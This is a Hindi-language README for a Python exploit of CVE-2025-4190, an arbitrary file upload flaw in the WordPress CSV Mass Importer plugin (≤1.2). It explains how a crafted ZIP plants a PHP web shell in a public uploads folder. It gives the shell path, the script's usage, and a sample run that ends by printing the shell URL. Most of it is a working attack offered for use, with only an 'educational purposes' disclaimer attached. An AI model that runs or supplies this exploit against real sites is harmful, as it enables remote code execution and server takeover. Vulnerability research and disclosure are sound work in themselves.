
CSV Mass Importer <= 1.2 - Admin+ मनमानी फ़ाइल अपलोड
वर्डप्रेस के लिए CSV Mass Importer प्लगइन (≤ 1.2) में Admin+ मनमाना फ़ाइल अपलोड कमजोरी है।
अपलोड की गई फ़ाइलों के अनुचित सत्यापन के कारण, उच्च‑विशेषाधिकार वाले उपयोगकर्ता (जैसे एडमिन) सर्वर पर मनमानी फ़ाइलें अपलोड कर सकते हैं, भले ही इसे प्रतिबंधित किया जाना चाहिए — उदाहरण के लिए मल्टीसाइट सेटअप में।
यह कमजोरी एक हमलावर को PHP शेल या दुर्भावनापूर्ण फ़ाइलें अपलोड करने की अनुमति देती है, जिससे सर्वर पर रिमोट कोड निष्पादन (RCE) होता है।
Nxploited (Khaled Alenazi) द्वारा खोजा गया।
CSV आयात सुविधा का उपयोग करते समय प्लगइन अपलोड की गई फ़ाइलों की सही जाँच करने में विफल रहता है।
PHP शेल वाली एक तैयार की गई ZIP फ़ाइल को अपलोड किया जा सकता है और सार्वजनिक रूप से सुलभ निर्देशिका में निकाला जा सकता है।
शेल पथ उदाहरण:
<target-url>/wp-content/uploads/cmi-data/nxploited.php
इस रिपॉजिटरी में एक तैयार पायथन एक्सप्लॉइट स्क्रिप्ट है: 4190.py
python CVE-2025-4190.py --help
usage: 4190.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress CSV Mass Importer <= 1.2 - Admin+ Arbitrary File Upload # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target WordPress site URL
--username, -un USERNAME
WordPress admin username
--password, -p PASSWORD
WordPress admin password
python CVE-2025-4190.py -u http://192.168.100.74:888/wordpress -un admin -p admin
[+] Logged in successfully.
[+] Payload 'nxploited.zip' created successfully.
[+] Payload uploaded successfully.
[+] Shell URL: http://192.168.100.74:888/wordpress/wp-content/uploads/cmi-data/nxploited.php
Exploited By Nxploited (Khaled_alenazi)
यह कोड केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस स्क्रिप्ट के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
जिम्मेदारी से उपयोग करें और केवल उन सिस्टम पर करें जिनका परीक्षण करने के लिए आप अधिकृत हैं।
Khaled Alenazi (Nxploited) द्वारा खोजा और विकसित किया गया 🌟